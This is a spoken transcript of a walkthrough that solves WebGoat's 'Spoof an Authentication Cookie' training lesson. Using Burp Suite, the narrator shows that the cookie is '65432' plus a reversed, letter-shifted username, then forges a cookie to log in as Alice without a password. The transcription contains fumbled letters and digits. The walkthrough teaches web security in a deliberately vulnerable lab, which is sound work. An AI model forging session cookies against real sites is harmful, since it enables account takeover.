[MUSIC] Hello everyone, welcome back. Today we're going to go over the solution for WebGoat's session management vulnerability. So first what we're going to do is log in as guest as usual. And make sure that our Burp Suite's proxy intercept is off. Then, we're going to go to Session Management Flaws > Spoof an Authentication Cookie. So the scenario here is we want to login as two users and look at what the authentication looks like. So what we're going to do is we're going to do that now. Log that in, okay. So, what we are going to do is now that we are logged in as WebGoat, the user WebGoat, we are going to turn on intercept on our proxy. And we are going to do a refresh and this refresh will basically send over the authentication cookie from the browser to the web server. And we will intercept that with Burp. So now here we see the auth cookie that the the WebGoat user was given when it first logged in. Now because it performed to refresh, it's sending this auth cookie back to the server. So let's, Type that our or remember it. Store it some place, because it looks like that's kind of an interesting. The form of it is kind of interesting, 65432 and then a bunch of letters. So anyway, let's turn off intercept and try out and log out and try to sign in with the second user with the username aspect. So let's do that now and we're going to do the same thing. We're going to turn on the intercept functionality on Burp Proxy and we're going to do a refresh. That refresh is going to attempt to send the browser's auth cookie back to the web server. So here we have this auth cookie and it looks eerily similar to the first users auth cookie, WebGoat. So now, if you have a look and just view the pattern, you'll see here that WebGoat, it's auth cookie is 65432 and then these letters. And then aspect is 65432, once again and these letters, but if you take the username WebGoat and you reverse it you will see an interesting pattern. Where the way the last half of the auth cookie looks like is if you take and compare the last half of the cookie that is has, WebGoat's cookie, you'll see an interesting pattern. When you reverse the username and the match against the username and the half of the cookie, you'll see this pattern of T-U-A-B-O-P-G-H-B-C-E-F-W-X So it looks like what it does is, Interesting. Now, let's look at Aspect and see if it holds with the same pattern. So you take the username Aspect and you reverse it and then match it against, The first half of its auth cookie. So it says, so that part, U-D-F-Q-T-B, and once again you see this interesting pattern that it matches one, it rotates, or reverses the username. And then what it does is for each character in the reversed username, it increases its letter by one. Its letter value, so here we see Aspect reversed and then T-U--D-E-F-P-Q-S-T and A-B. So why don't we do that with Alice? So we take Alice and then we increment each character by one in the letter, in the letter order. So we have A to B, L to M, I to J, C to D and E to F and then we reverse that so we get, after we reverse it. FDJN, and then B. So what happens if we we concatenate F-D-J-M-B and 65432 together in order to get Alice's auth cookie? So let's do that now. Let's turn off intercept, we're going to log out and we'll say Alice don't have to give a password, Which is the fun part. So what we'll do is we'll turn intercept on and we'll do a Log in. And here, we've got the traffic for the login intercepted. So why don't we add the auth cookie just like the previous users? So we go 645432 and then for Alice, it's FDJMB as we worked out in our notepad here. Let's press Enter and then we'll forward that request off to the server. Lets try that again. Okay, ABLMIJIGHIJ, yeah. ABC LMN IJK HIJK HIJ, yeah. CD and an EF. Okay, did I press that right? Let's turn off intercept, okay, let's do that one more time. Alice, and intercept is on, Login, okay. And we'll add the semicolon and then say auth cookie equals 65432FDJMB and forward, aha, success! Look at that! We've been able to authenticate as Alice, as you can see it says Welcome Alice. And we didn't even have to enter in the password. So, as you can see, we've been able to spoof an authentication cookie, thanks for listening.